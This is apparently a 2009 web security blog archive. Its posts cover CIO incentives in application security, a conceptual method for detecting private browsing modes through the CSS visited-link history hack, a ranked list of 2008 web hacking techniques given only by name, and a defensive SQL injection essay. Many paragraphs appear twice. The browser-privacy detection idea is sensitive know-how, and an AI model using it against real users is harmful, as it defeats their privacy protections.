Consider for a moment that Website Security equals Software Security, which it does plus much more. Then a maturing program will often require fundamental changes in business and code development processes. Policies need to be established, developers trained, staff hired, technology acquired, etc. An uphill battle requiring tremendous resources over the course of multiple years with scars and lessons earned along the way. As an example, the Building Security In Maturity Model (BSIMM), a real-world set of software security comparisons, observes 110 different potential activities! At the same time, measuring the value obtained from defect reduction in terms of website risk mitigation is extremely difficult. This is not to say the evolution should not begin, but it’s vital to understand the personal incentives that influence decision making.
A CIOs (and CSO) average tenure at a company is roughly 4 years, so they may view a multi-year website/software security program with immeasurable returns as a risky career move. And rightly so! If the effort takes too long and the business loses patience their credibility suffers. It is much safer to maintain the status quo spending on firewalls, A/V, network scans, and patch management where metrics are easier to quantify, report, and justify. Still, I believe CIOs want to do the right thing if enabled. So I asked my some 900+ Twitter followers (@jeremiahg) for ideas on how one might achieve “quick wins” in Web Application Security with measurable results that CIOs would appreciate. Several good ideas arose, mostly about reporting blocked attacks tied to defense measures, and interestingly not a single one mentioned the Software Development Life-cycle (SDL). I asked why, to which Chris Eng (@chriseng) of Veracode responded, “That's because SDL isn't quick.” It then becomes crystal clear why justifying a proactive budget is difficult to say the least. If we, the experts, don’t know, how can we expect CIOs to do any better?!
What happens when a website gets hacked you ask?
Simple. Risk transference and/or mitigation, but not necessarily reduction. Dollars free up shortly after an incident, but only enough to make the immediate problem go away, quickly, and usually only temporarily. Unfortunately that doesn’t necessarily translate to a lasting software security program. A CIO may first act by terminating the programmer or third-party development shop that authored the code. There is also the option of decommissioning the website entirely; replacing it with an outsourced Software-as-a-Service provider; or bring it in-house to manage internally. A Web Application Firewall could be deployed and a network scanning vendor commissioned to apply the rubber stamp assurance to show anyone asking. The point is, a CIO is compelled to demonstrate a level of success in short order and report why the same incident won’t happen again. They are caught in a position forcing them to react tactically rather than strategically.
Seriously, what other real choice does a CIO or IT Security have!? Getting hacked again and again while implementing an expensive mega software security program whose results lie years away is not particularly attractive or practical. Something needs to happen immediately. This is a big reason why accurate vulnerability assessment results piped into Web Application Firewalls (VA+WAF) has become such an attractive option. A solution capable of identifying vulnerabilities, virtually patching them, and demonstrating success to the business -- in terms of risk reduction. Quick wins are possible in a matter of days or weeks, rather than years. A similar option is desperately needed from the software development side of Web application security field. A program that produces measurable results quickly that can be built upon even after the CIO leaves. A win-win for all involved. If such a model exists, it’s not well advertised.
The only other major budgetary lever is compliance where justification occurs without consideration of or a requirement for risk reduction, “We need money to do X because the standard says so.” For myself, and I think many others too, that is just not good enough. Lest we forget, compliance != security. So I’m asking again...How do you achieve quick wins in Web Application Security, rooted in software, with measurable results that CIOs would appreciate?
During an event a panel of Gartner Analysts asked the audience what the best way is for organization to invest $1 million dollars in effort to reduce risk. The choices were Network, Host, or Application security to which the Gartner analysts made their cases for these three disciplines. The catch was the budget could not be shared between them and must be prioritized into a single initiative. The audience selected Application security. However, the Gartner CSO (who took the role of CIO in the play) overruled the audiences' decision. They instead selected Network security, while at the same time curiously agreeing that Application security would have been the better path. His rational was that that it is easier for him to show results to his CEO if he invests in the Network.
Think about that!
Consider for a moment that Website Security equals Software Security, which it does plus much more. Then a maturing program will often require fundamental changes in business and code development processes. Policies need to be established, developers trained, staff hired, technology acquired, etc. An uphill battle requiring tremendous resources over the course of multiple years with scars and lessons earned along the way. As an example, the Building Security In Maturity Model (BSIMM), a real-world set of software security comparisons, observes 110 different potential activities! At the same time, measuring the value obtained from defect reduction in terms of website risk mitigation is extremely difficult. This is not to say the evolution should not begin, but it’s vital to understand the personal incentives that influence decision making.
A CIOs (and CSO) average tenure at a company is roughly 4 years, so they may view a multi-year website/software security program with immeasurable returns as a risky career move. And rightly so! If the effort takes too long and the business loses patience their credibility suffers. It is much safer to maintain the status quo spending on firewalls, A/V, network scans, and patch management where metrics are easier to quantify, report, and justify. Still, I believe CIOs want to do the right thing if enabled. So I asked my some 900+ Twitter followers (@jeremiahg) for ideas on how one might achieve “quick wins” in Web Application Security with measurable results that CIOs would appreciate. Several good ideas arose, mostly about reporting blocked attacks tied to defense measures, and interestingly not a single one mentioned the Software Development Life-cycle (SDL). I asked why, to which Chris Eng (@chriseng) of Veracode responded, “That's because SDL isn't quick.” It then becomes crystal clear why justifying a proactive budget is difficult to say the least. If we, the experts, don’t know, how can we expect CIOs to do any better?!
What happens when a website gets hacked you ask?
Simple. Risk transference and/or mitigation, but not necessarily reduction. Dollars free up shortly after an incident, but only enough to make the immediate problem go away, quickly, and usually only temporarily. Unfortunately that doesn’t necessarily translate to a lasting software security program. A CIO may first act by terminating the programmer or third-party development shop that authored the code. There is also the option of decommissioning the website entirely; replacing it with an outsourced Software-as-a-Service provider; or bring it in-house to manage internally. A Web Application Firewall could be deployed and a network scanning vendor commissioned to apply the rubber stamp assurance to show anyone asking. The point is, a CIO is compelled to demonstrate a level of success in short order and report why the same incident won’t happen again. They are caught in a position forcing them to react tactically rather than strategically.
Seriously, what other real choice does a CIO or IT Security have!? Getting hacked again and again while implementing an expensive mega software security program whose results lie years away is not particularly attractive or practical. Something needs to happen immediately. This is a big reason why accurate vulnerability assessment results piped into Web Application Firewalls (VA+WAF) has become such an attractive option. A solution capable of identifying vulnerabilities, virtually patching them, and demonstrating success to the business -- in terms of risk reduction. Quick wins are possible in a matter of days or weeks, rather than years. A similar option is desperately needed from the software development side of Web application security field. A program that produces measurable results quickly that can be built upon even after the CIO leaves. A win-win for all involved. If such a model exists, it’s not well advertised.
The only other major budgetary lever is compliance where justification occurs without consideration of or a requirement for risk reduction, “We need money to do X because the standard says so.” For myself, and I think many others too, that is just not good enough. Lest we forget, compliance != security. So I’m asking again...How do you achieve quick wins in Web Application Security, rooted in software, with measurable results that CIOs would appreciate?
Detecting Private Browsing Mode
I shared the original concept with Collin Jackson who developed the proof-of-concept code. The basic idea is one might want know if a Web user is in the Private Browsing mode in Safari and Firefox, the Incognito mode in Google Chrome, or the InPrivate mode for Internet Explorer 8. The way it works is by having someone visit a unique (never before seen) URL and then checking to see whether a link to that URL is treated as visited by CSS (standard color history hack). And if they haven't, then you know some privacy feature is actively blocking.
Definitely not anything super serious, but worth putting out there in case someone might have further ideas.
Definitely not anything super serious, but worth putting out there in case someone might have further ideas.
Monday, March 16, 2009
Web Security Readers Digest
Over the last two weeks I visited 5 different cities across the U.S. As such I haven't had much time to blog, however did get a chance to get in some reading. Plane rides are good for that. There is a tremendous amount going on in Web security, far more than I could ever dig deeply enough into and blog adequately. So here is the abridged version of the things I found particularly interesting, in no particular order.
1) Robert Auger published “Socket Capable Browser Plugins Result In Transparent Proxy Abuse”, which appears to be a solid candidate 2009’s Top Web Hacking Techniques. Yet more Intranet hacking goodness, but this time with a CERT VU#435052. Serious style points.
"When certain transparent proxy architectures are in use an attacker can achieve a partial Same Origin Policy Bypass resulting in access to any host reachable by the proxy via the use of client plug-in technologies (such as Flash, Applets, etc) with socket capabilities."
2) The software security gods give unto the people a Building Security In Maturity Model (BSIMM). Nine world-class software security initiatives were studied that include Brad Arkin (Adobe), Eric Baize (EMC), Alex Gantman (QUALCOMM), Eric Grosse (Google), David Hahn (Wells Fargo), Steve Lipner (Microsoft), and Jim Routh (DTCC). Want to get some insight into the what the big boys are doing interally? This is the best way to compare your program to theirs.
3) Yes, Software-as-a-Service is all the rage. Yes, Software-as-a-Service in many cases is more superior and less expensive than enterprise software. Yes, as Software-as-a-Service vendor specliazing in Website vulnerability assessments, I'm more than biased. The things I like about Software-as-a-Service best though can be summarized by the following comment...
"In the traditional software sales model, the idea is to impress the customer in the beginning, make the sale and collect the big check. While the customer is certainly valued, this is really a model that benefits the software company. Conversely, SaaS is a recurring revenue model where vendors gain maximum value by retaining customers over the long term."
That is precisely how we approach our business and why our renewal rates are sky high. It is in our best interest to make sure customers are well taken care of. Coversely if you buy some security software brand X, then basically you are on your own.
4) Penetration testing is dead, long live penetration testing, and here I thought Brian Chess (Fortify Software) was calling for the death of my business. :) Brian does a good job refining comments he made earlier about how pen-testing must adapt or die.
"People are now spending more money on getting code right in the first place than they are on proving it's wrong. However, this doesn't signal the end of the road for penetration testing, nor should it, but it does change things."
This is hard to disagree with and he even takes time to share some nice words about us...
"If you'd like a sneak preview of what the future holds, check out the work White Hat Security has done to integrate their vulnerability measurement service with Web application firewalls. This is attack and defence working together in a creative new way."
5) Rich Mogull and Adrian Lane of Securosis release a monster! Building a Web Application Security Program. Amazing that is has taken this long for the Web security industry to produce a document of this kind and quality. If you a plan in place, don't know where to begin, or find the generic "sofware security" guidance just isn't going to get it done for your enterprise, this document is the one for you.
6) Isn't it fun the run a social network? Religious wars erupt on Facebook, in this case, it involves some Web Hacking. “A group named 'Christians on Facebook' has been taken over it seems by pro-Islam members.” Reminds me of the days back at Yahoo!
7) This quote by Pete Lindstrom I found particularly thought provoking...
“If finding vulnerabilities makes software more secure, why do we assert that software with the highest vulnerability count is less secure (than, e.g., a competitor)?”
8) Criminal uses Google Earth to perform reconn searching lead roof tiles, which he would steal and sell to scrap metal dealers.
9) If you care about such things, you already know about it and its old news. Heartland, RBS WorldPay no longer PCI compliant.
10) Software tools do NOT scale! Neil MacDonald of Garnet was in this case talking about static application security testing (SAST) tools, “A tool alone cannot solve what fundamentally is a development process problem.” Can I get an AMEN! The very same issue plaguing dynamic testing tools I blogged on a while back. Technology helps, but people matter most.
1) Robert Auger published “Socket Capable Browser Plugins Result In Transparent Proxy Abuse”, which appears to be a solid candidate 2009’s Top Web Hacking Techniques. Yet more Intranet hacking goodness, but this time with a CERT VU#435052. Serious style points.
"When certain transparent proxy architectures are in use an attacker can achieve a partial Same Origin Policy Bypass resulting in access to any host reachable by the proxy via the use of client plug-in technologies (such as Flash, Applets, etc) with socket capabilities."
2) The software security gods give unto the people a Building Security In Maturity Model (BSIMM). Nine world-class software security initiatives were studied that include Brad Arkin (Adobe), Eric Baize (EMC), Alex Gantman (QUALCOMM), Eric Grosse (Google), David Hahn (Wells Fargo), Steve Lipner (Microsoft), and Jim Routh (DTCC). Want to get some insight into the what the big boys are doing interally? This is the best way to compare your program to theirs.
3) Yes, Software-as-a-Service is all the rage. Yes, Software-as-a-Service in many cases is more superior and less expensive than enterprise software. Yes, as Software-as-a-Service vendor specliazing in Website vulnerability assessments, I'm more than biased. The things I like about Software-as-a-Service best though can be summarized by the following comment...
"In the traditional software sales model, the idea is to impress the customer in the beginning, make the sale and collect the big check. While the customer is certainly valued, this is really a model that benefits the software company. Conversely, SaaS is a recurring revenue model where vendors gain maximum value by retaining customers over the long term."
That is precisely how we approach our business and why our renewal rates are sky high. It is in our best interest to make sure customers are well taken care of. Coversely if you buy some security software brand X, then basically you are on your own.
4) Penetration testing is dead, long live penetration testing, and here I thought Brian Chess (Fortify Software) was calling for the death of my business. :) Brian does a good job refining comments he made earlier about how pen-testing must adapt or die.
"People are now spending more money on getting code right in the first place than they are on proving it's wrong. However, this doesn't signal the end of the road for penetration testing, nor should it, but it does change things."
This is hard to disagree with and he even takes time to share some nice words about us...
"If you'd like a sneak preview of what the future holds, check out the work White Hat Security has done to integrate their vulnerability measurement service with Web application firewalls. This is attack and defence working together in a creative new way."
5) Rich Mogull and Adrian Lane of Securosis release a monster! Building a Web Application Security Program. Amazing that is has taken this long for the Web security industry to produce a document of this kind and quality. If you a plan in place, don't know where to begin, or find the generic "sofware security" guidance just isn't going to get it done for your enterprise, this document is the one for you.
6) Isn't it fun the run a social network? Religious wars erupt on Facebook, in this case, it involves some Web Hacking. “A group named 'Christians on Facebook' has been taken over it seems by pro-Islam members.” Reminds me of the days back at Yahoo!
7) This quote by Pete Lindstrom I found particularly thought provoking...
“If finding vulnerabilities makes software more secure, why do we assert that software with the highest vulnerability count is less secure (than, e.g., a competitor)?”
8) Criminal uses Google Earth to perform reconn searching lead roof tiles, which he would steal and sell to scrap metal dealers.
9) If you care about such things, you already know about it and its old news. Heartland, RBS WorldPay no longer PCI compliant.
10) Software tools do NOT scale! Neil MacDonald of Garnet was in this case talking about static application security testing (SAST) tools, “A tool alone cannot solve what fundamentally is a development process problem.” Can I get an AMEN! The very same issue plaguing dynamic testing tools I blogged on a while back. Technology helps, but people matter most.
Monday, February 23, 2009
Top Ten Web Hacking Techniques of 2008 (Official)
We searched far and wide collecting as many Web Hacking Techniques published in 2008 as possible -- ~70 in all. These new and innovative techniques were analyzed and ranked based upon their novelty, impact, and pervasiveness. The 2008 competition was exceptionally fierce and our panel of judges (Rich Mogull, Chris Hoff, H D Moore, and Jeff Forristal) had their work cut out for them. For any researcher, or "breaker" if you prefer, simply the act of creating something unique enough to appear on the list is no small feat. That much should be considered an achievement. In the end, ten Web hacking techniques rose head and shoulders above.
Supreme honors go to Billy Rios, Nathan McFeters, Rob Carter, and John Heasman for GIFAR! The judges were convinced their work stood out amongst the field. Beyond industry recognition, they also will receive the free pass to Black Hat USA 2009 (generously sponsored by Black Hat)! Now they have to fight over it. ;)
Congratulations to all!
Coming up at SnowFROC AppSec 2009 and RSA Conference 2009 it will be my great privilege to highlight the results. Each of the top ten techniques will be described in technical detail for how they work, what they can do, who they affect, and how best to defend against them. The opportunity provides a chance to get a closer look at the new attacks that could be used against us in the future -- some of which already have.
Top Ten Web Hacking Techniques of 2008!
1. GIFAR
(Billy Rios, Nathan McFeters, Rob Carter, and John Heasman)
2. Breaking Google Gears' Cross-Origin Communication Model
(Yair Amit)
3. Safari Carpet Bomb
(Nitesh Dhanjani)
4. Clickjacking / Videojacking
(Jeremiah Grossman and Robert Hansen)
5. A Different Opera
(Stefano Di Paola)
6. Abusing HTML 5 Structured Client-side Storage
(Alberto Trivero)
7. Cross-domain leaks of site logins via Authenticated CSS
(Chris Evans and Michal Zalewski)
8. Tunneling TCP over HTTP over SQL Injection
(Glenn Wilkinson, Marco Slaviero and Haroon Meer)
9. ActiveX Repurposing
(Haroon Meer)
10. Flash Parameter Injection
(Yuval Baror, Ayal Yogev, and Adi Sharabani)
The List
Supreme honors go to Billy Rios, Nathan McFeters, Rob Carter, and John Heasman for GIFAR! The judges were convinced their work stood out amongst the field. Beyond industry recognition, they also will receive the free pass to Black Hat USA 2009 (generously sponsored by Black Hat)! Now they have to fight over it. ;)
Congratulations to all!
Coming up at SnowFROC AppSec 2009 and RSA Conference 2009 it will be my great privilege to highlight the results. Each of the top ten techniques will be described in technical detail for how they work, what they can do, who they affect, and how best to defend against them. The opportunity provides a chance to get a closer look at the new attacks that could be used against us in the future -- some of which already have.
Top Ten Web Hacking Techniques of 2008!
1. GIFAR
(Billy Rios, Nathan McFeters, Rob Carter, and John Heasman)
2. Breaking Google Gears' Cross-Origin Communication Model
(Yair Amit)
3. Safari Carpet Bomb
(Nitesh Dhanjani)
4. Clickjacking / Videojacking
(Jeremiah Grossman and Robert Hansen)
5. A Different Opera
(Stefano Di Paola)
6. Abusing HTML 5 Structured Client-side Storage
(Alberto Trivero)
7. Cross-domain leaks of site logins via Authenticated CSS
(Chris Evans and Michal Zalewski)
8. Tunneling TCP over HTTP over SQL Injection
(Glenn Wilkinson, Marco Slaviero and Haroon Meer)
9. ActiveX Repurposing
(Haroon Meer)
10. Flash Parameter Injection
(Yuval Baror, Ayal Yogev, and Adi Sharabani)
The List
- CUPS Detection
- CSRFing the uTorrent plugin
- Clickjacking / Videojacking
- Bypassing URL Authentication and Authorization with HTTP Verb Tampering
- I used to know what you watched, on YouTube (CSRF + Crossdomain.xml)
- Safari Carpet Bomb
- Flash clipboard Hijack
- Flash Internet Explorer security model bug
- Frame Injection Fun
- Free MacWorld Platinum Pass? Yes in 2008!
- Diminutive Worm, 161 byte Web Worm
- SNMP XSS Attack (1)
- Res Timing File Enumeration Without JavaScript in IE7.0
- Stealing Basic Auth with Persistent XSS
- Smuggling SMTP through open HTTP proxies
- Collecting Lots of Free 'Micro-Deposits'
- Using your browser URL history to estimate gender
- Cross-site File Upload Attacks
- Same Origin Bypassing Using Image Dimensions
- HTTP Proxies Bypass Firewalls
- Join a Religion Via CSRF
- Cross-domain leaks of site logins via Authenticated CSS
- JavaScript Global Namespace Pollution
- GIFAR
- HTML/CSS Injections - Primitive Malicious Code
- Hacking Intranets Through Web Interfaces
- Cookie Path Traversal
- Racing to downgrade users to cookie-less authentication
- MySQL and SQL Column Truncation Vulnerabilities
- Building Subversive File Sharing With Client Side Applications
- Firefox XML injection into parse of remote XML
- Firefox cross-domain information theft (simple text strings, some CSV)
- Firefox 2 and WebKit nightly cross-domain image theft
- Browser's Ghost Busters
- Exploiting XSS vulnerabilities on cookies
- Breaking Google Gears' Cross-Origin Communication Model
- Flash Parameter Injection
- Cross Environment Hopping
- Exploiting Logged Out XSS Vulnerabilities
- Exploiting CSRF Protected XSS
- ActiveX Repurposing, (1, 2)
- Tunneling tcp over http over sql-injection
- Arbitrary TCP over uploaded pages
- Local DoS on CUPS to a remote exploit via specially-crafted webpage (1)
- JavaScript Code Flow Manipulation
- Common localhost dns misconfiguration can lead to "same site" scripting
- Pulling system32 out over blind SQL Injection
- Dialog Spoofing - Firefox Basic Authentication
- Skype cross-zone scripting vulnerability
- Safari pwns Internet Explorer
- IE "Print Table of Links" Cross-Zone Scripting Vulnerability
- A different Opera
- Abusing HTML 5 Structured Client-side Storage
- SSID Script Injection
- DHCP Script Injection
- File Download Injection
- Navigation Hijacking (Frame/Tab Injection Attacks)
- UPnP Hacking via Flash
- Total surveillance made easy with VoIP phone
- Social Networks Evil Twin Attacks
- Recursive File Include DoS
- Multi-pass filters bypass
- Session Extending
- Code Execution via XSS (1)
- Redirector’s hell
- Persistent SQL Injection
- JSON Hijacking with UTF-7
- SQL Smuggling
- Abusing PHP Sockets (1, 2)
- CSRF on Novell GroupWise WebAccess
Sunday, February 22, 2009
SQL Injection, eye of the storm
Originally published by Security Horizon in the Winter 2009 edition of Security Journal.
In 2008 SQL Injection became the leading method of malware distribution, infecting millions of Web pages and foisting browser-based exploits upon unsuspecting visitors. The ramifications to online businesses include data loss, PCI fines, downtime, recovery costs, brand damage, and revenue decline when search engines blacklist them. According to WhiteHat Security, 16 percent of websites are vulnerable to SQL Injection. This is likely under-reported given that the statistics are largely based on top-tier Web properties that employ a website vulnerability management solution to identify the problem. The majority of websites do not and as such may be completely unaware of the extent of the issue. In addition, some recommended security best-practice have ironically benefited malicious hackers. Websense now reports that "60 percent of the top 100 most popular Web sites have either hosted or been involved in malicious activity in the first half of 2008." Let’s examine the forces that have aligned to create the storm that allows SQL Injection to thrive.
Any custom Web application that lacks proper input-validation, fails to use parameterized SQL statements, and/or creates dynamic SQL with user-supplied data potentially leave themselves open to SQL Injection attacks -- unauthorized commands passed to back-end databases. When Rain Forest Puppy first described SQL Injection ten years ago, on Christmas Day 1998, it was a targeted one-off attack capable of exploiting only a single website at a time. Custom Web applications contain custom vulnerabilities and require custom exploits. Successfully extracting data out of an unfamiliar database is different in each instance and greatly aided by error messages revealing snippets of server-side code.
To solve the SQL Injection problem, preferably in the code, first we must identify what is broken. The easiest method to-date has been through remote black-box testing, submitting meta-characters (single quotes and semicolons) into Web applications. If the website returns a recognizable response, such as an ODBC error message, there is a high probability that a weakness exists. Comprehensive security testing, typically aided by black-box vulnerability scanners, performs the same procedure on every application input-point including URL query parameters, POST data, cookies, etc. and repeated with each code update. This software security testing process is also now one of the assessment options mandated by PCI-DSS section 6.6.
In the wake of highly publicized compromises like the 2006 incident at CardSystems, a back-end credit card transaction processor, in which millions of stolen credit card numbers fell into the wrong hands, website owners were strongly encouraged to update their Web application code and suppress error messages to defend against SQL Injection attacks. Many implemented solely the latter since it only required a simple configuration change, hindering the bad guy’s ability to identify SQL Injection vulnerabilities. Since the vulnerabilities couldn’t be found easily, perhaps this contributed to incorrectly training developers that security through obscurity was enough. Widespread attacks were not seen as prevalent enough to justify a serious software security investment. Despite cutting-edge Blind SQL Injection research helping to improve black-box testing, error message suppression contributed to three very important side effects:
For example, when vulnerability assessments are conducted on production systems, a cardinal rule must be followed, “Do no harm.” This often requires that testing rates be limited (X number of requests per second), testing windows be respected (usually during off-peak hours), and tests be nondestructive. It should go without saying that we do not want to crash websites or fill databases with undesirable content. Malicious hackers have no such restrictions as they may test however they want, whenever they want, for as long as they want. The other disadvantage for website defenders is that they must be 100% accurate at finding and fixing every issue all the time, while the attacker need only to exploit a single missed issue. This is an unfortunate, but inescapable reality in Web security and why testing frequency and comprehensiveness approach is vital.
Source code review (aka white-box testing) is the other option to locate SQL Injection vulnerabilities and often able to peer deeper into the problem than black-box testing. Of course you must have access to the source code. Before considering this as a scalable solution begin by asking yourself if executive management would allocate enough resources to perform source code reviews on every website every time they change. Thinking globally, let’s consider that there are over 186 million websites. While not all are “important,” if 16% had just a single vulnerability as previously cited, that means a staggering 30 million issues are in circulation. Would it be reasonable to project that finding (not fixing) each unique issue through white-box testing, even assisted by automation, would require $100 in personnel and technology costs? If so, we are talking about at least a $3 billion dollar price tag to simply locate SQL Injection -- to say nothing about other more prevalent issues such as Cross-Site Scripting and Cross-Site Request Forgery that will be left undiscovered.
Secure software education is another valuable long-term strategy that will help prevent another 30 million vulnerabilities being added to the pile over the next 15 years, but will not provide a short-term fix to the problem. Currently, there are roughly 17 million developers worldwide who are not educated on the basic concepts of secure coding that could help them tackle the SQL injection and other issues. Would $500 per developer be an acceptable rate for professional training (commercial 2-day classes typically start at $1,000 on up)? If so, the market must be prepared to make an $8.5 billion investment and then wait for everyone to come up to speed. Obviously the private sector is not going to shoulder such a financial burden alone, not in any economy, let alone in a recession. The fact is education costs must be shared in amongst colleges, enterprises, vendors, developers themselves, or through materials made freely available by organizations such as OWASP and WASC.
The climate for SQL Injection vulnerabilities has all the makings of a perfect storm, one we are already experiencing. The issue is extremely dangerous, incredibly pervasive, difficult to identify, easy to exploit, and expensive to fix. Over the last 15 years organizations have accumulated a lot Web security debt that eclipses our currently estimated spending of ~$300 million, combining outlays for scanning tools, professional services, training, and Web application firewalls. Perhaps we should ask president-elect Obama for a Web security bailout. Not likely. The fact is not every organization will invest adequately to protect themselves, at least not over night. Those who do not will undoubtedly become the low hanging fruit bad guys target first. The smart money says vast numbers of compromises will continue throughout 2009.
For those wishing to do all they can to prevent compromises, the answer is adopting a holistic approach addressing overall Web security, including SQL Injection. While fully articulating the details of each solution is beyond the scope of this article, it is important to highlight several of the most important and why they are a good ideas.
In 2008 SQL Injection became the leading method of malware distribution, infecting millions of Web pages and foisting browser-based exploits upon unsuspecting visitors. The ramifications to online businesses include data loss, PCI fines, downtime, recovery costs, brand damage, and revenue decline when search engines blacklist them. According to WhiteHat Security, 16 percent of websites are vulnerable to SQL Injection. This is likely under-reported given that the statistics are largely based on top-tier Web properties that employ a website vulnerability management solution to identify the problem. The majority of websites do not and as such may be completely unaware of the extent of the issue. In addition, some recommended security best-practice have ironically benefited malicious hackers. Websense now reports that "60 percent of the top 100 most popular Web sites have either hosted or been involved in malicious activity in the first half of 2008." Let’s examine the forces that have aligned to create the storm that allows SQL Injection to thrive.
Any custom Web application that lacks proper input-validation, fails to use parameterized SQL statements, and/or creates dynamic SQL with user-supplied data potentially leave themselves open to SQL Injection attacks -- unauthorized commands passed to back-end databases. When Rain Forest Puppy first described SQL Injection ten years ago, on Christmas Day 1998, it was a targeted one-off attack capable of exploiting only a single website at a time. Custom Web applications contain custom vulnerabilities and require custom exploits. Successfully extracting data out of an unfamiliar database is different in each instance and greatly aided by error messages revealing snippets of server-side code.
To solve the SQL Injection problem, preferably in the code, first we must identify what is broken. The easiest method to-date has been through remote black-box testing, submitting meta-characters (single quotes and semicolons) into Web applications. If the website returns a recognizable response, such as an ODBC error message, there is a high probability that a weakness exists. Comprehensive security testing, typically aided by black-box vulnerability scanners, performs the same procedure on every application input-point including URL query parameters, POST data, cookies, etc. and repeated with each code update. This software security testing process is also now one of the assessment options mandated by PCI-DSS section 6.6.
In the wake of highly publicized compromises like the 2006 incident at CardSystems, a back-end credit card transaction processor, in which millions of stolen credit card numbers fell into the wrong hands, website owners were strongly encouraged to update their Web application code and suppress error messages to defend against SQL Injection attacks. Many implemented solely the latter since it only required a simple configuration change, hindering the bad guy’s ability to identify SQL Injection vulnerabilities. Since the vulnerabilities couldn’t be found easily, perhaps this contributed to incorrectly training developers that security through obscurity was enough. Widespread attacks were not seen as prevalent enough to justify a serious software security investment. Despite cutting-edge Blind SQL Injection research helping to improve black-box testing, error message suppression contributed to three very important side effects:
- Black-box vulnerability scanner false-positive and false-negative rate skyrocketed.
- SQL Injection became significantly harder to identify, but ironically not exploit.
- Extracting data out of a database became exceptionally more laborious than injecting data in.
For example, when vulnerability assessments are conducted on production systems, a cardinal rule must be followed, “Do no harm.” This often requires that testing rates be limited (X number of requests per second), testing windows be respected (usually during off-peak hours), and tests be nondestructive. It should go without saying that we do not want to crash websites or fill databases with undesirable content. Malicious hackers have no such restrictions as they may test however they want, whenever they want, for as long as they want. The other disadvantage for website defenders is that they must be 100% accurate at finding and fixing every issue all the time, while the attacker need only to exploit a single missed issue. This is an unfortunate, but inescapable reality in Web security and why testing frequency and comprehensiveness approach is vital.
Source code review (aka white-box testing) is the other option to locate SQL Injection vulnerabilities and often able to peer deeper into the problem than black-box testing. Of course you must have access to the source code. Before considering this as a scalable solution begin by asking yourself if executive management would allocate enough resources to perform source code reviews on every website every time they change. Thinking globally, let’s consider that there are over 186 million websites. While not all are “important,” if 16% had just a single vulnerability as previously cited, that means a staggering 30 million issues are in circulation. Would it be reasonable to project that finding (not fixing) each unique issue through white-box testing, even assisted by automation, would require $100 in personnel and technology costs? If so, we are talking about at least a $3 billion dollar price tag to simply locate SQL Injection -- to say nothing about other more prevalent issues such as Cross-Site Scripting and Cross-Site Request Forgery that will be left undiscovered.
Secure software education is another valuable long-term strategy that will help prevent another 30 million vulnerabilities being added to the pile over the next 15 years, but will not provide a short-term fix to the problem. Currently, there are roughly 17 million developers worldwide who are not educated on the basic concepts of secure coding that could help them tackle the SQL injection and other issues. Would $500 per developer be an acceptable rate for professional training (commercial 2-day classes typically start at $1,000 on up)? If so, the market must be prepared to make an $8.5 billion investment and then wait for everyone to come up to speed. Obviously the private sector is not going to shoulder such a financial burden alone, not in any economy, let alone in a recession. The fact is education costs must be shared in amongst colleges, enterprises, vendors, developers themselves, or through materials made freely available by organizations such as OWASP and WASC.
The climate for SQL Injection vulnerabilities has all the makings of a perfect storm, one we are already experiencing. The issue is extremely dangerous, incredibly pervasive, difficult to identify, easy to exploit, and expensive to fix. Over the last 15 years organizations have accumulated a lot Web security debt that eclipses our currently estimated spending of ~$300 million, combining outlays for scanning tools, professional services, training, and Web application firewalls. Perhaps we should ask president-elect Obama for a Web security bailout. Not likely. The fact is not every organization will invest adequately to protect themselves, at least not over night. Those who do not will undoubtedly become the low hanging fruit bad guys target first. The smart money says vast numbers of compromises will continue throughout 2009.
For those wishing to do all they can to prevent compromises, the answer is adopting a holistic approach addressing overall Web security, including SQL Injection. While fully articulating the details of each solution is beyond the scope of this article, it is important to highlight several of the most important and why they are a good ideas.
- Security throughout the Software Development Life-Cycle, because an ounce of prevention is worth a pound of cure.
- Education, teach a man to fish.
- Vulnerability Assessment, because you cannot secure what you cannot measure.
- Web Application Firewalls, because software is not and will never be perfect.
- Web Browser security, because one must be able to protect themselves against a hostile website.
Thursday, February 05, 2009
Indirect Hard Losses
Indirect Hard Losses is an estimation of the decrease in Web transactions of a certain class of customer, specifically those whose security/privacy have been compromised in the past, compared to those who have not. I first learned about this metric from Robert "RSnake" Hansen (SecTheory), but didn’t know it had a name until I spoke with Laura Mather (Silver Tail Systems). Indirect Hard Losses is rarely discussed, though I suspect it is internally measured, but not published publicly. As stated by InformationWeek regarding a Ponemon Institute study on the Cost of a Data Breach, “Customers, it seems, lose faith in organizations that can't keep data safe and take their business elsewhere.” The next logical question is how much?
Web page malware infections, phishing scams, and website data compromises are common and effective cyber crimes. All the largest online brands have suffered at least one incident compromising the security/privacy of some portion of their customer base. While victimized customers can be made whole again by reimbursing money stolen, replacing lost merchandise, restoring account access, and paying for credit monitoring -- the event undoubtedly makes a lasting impression about the brand. A business may not lose the customer completely, but from my conversations, a nontrivial decline in revenue-generating activity can clearly be measured. Unfortunately I’m unable to reveal names or cite figures as evidence.
Consider for a moment if a social network user’s account is taken over and offensive messages are sent, privacy is violated, and general embarrassment ensues. This is a frequent occurrence, just ask Soulja Boy, Kayne West, Lil Kim, Britney Spears, Fox News and scores of other non-celebrities. Would it be unreasonable to expect this might cause a user to spend less time on the website? For banking customers, perhaps they’d carry smaller account balances and refrain from signing up for new services. Ecommerce retail customers could potentially spend less, less often. All these tendencies would lead to Indirect Hard Losses.
Anonymously or otherwise, anyone want to provide some anecdotal loss percentages that they’ve seen?
Web page malware infections, phishing scams, and website data compromises are common and effective cyber crimes. All the largest online brands have suffered at least one incident compromising the security/privacy of some portion of their customer base. While victimized customers can be made whole again by reimbursing money stolen, replacing lost merchandise, restoring account access, and paying for credit monitoring -- the event undoubtedly makes a lasting impression about the brand. A business may not lose the customer completely, but from my conversations, a nontrivial decline in revenue-generating activity can clearly be measured. Unfortunately I’m unable to reveal names or cite figures as evidence.
Consider for a moment if a social network user’s account is taken over and offensive messages are sent, privacy is violated, and general embarrassment ensues. This is a frequent occurrence, just ask Soulja Boy, Kayne West, Lil Kim, Britney Spears, Fox News and scores of other non-celebrities. Would it be unreasonable to expect this might cause a user to spend less time on the website? For banking customers, perhaps they’d carry smaller account balances and refrain from signing up for new services. Ecommerce retail customers could potentially spend less, less often. All these tendencies would lead to Indirect Hard Losses.
Anonymously or otherwise, anyone want to provide some anecdotal loss percentages that they’ve seen?
Who's who and what's what

Web Application Security Consortium (WASC)
An international group of experts, industry practitioners, and organizational representatives who produce open source and widely agreed upon best-practice security standards for the World Wide Web.
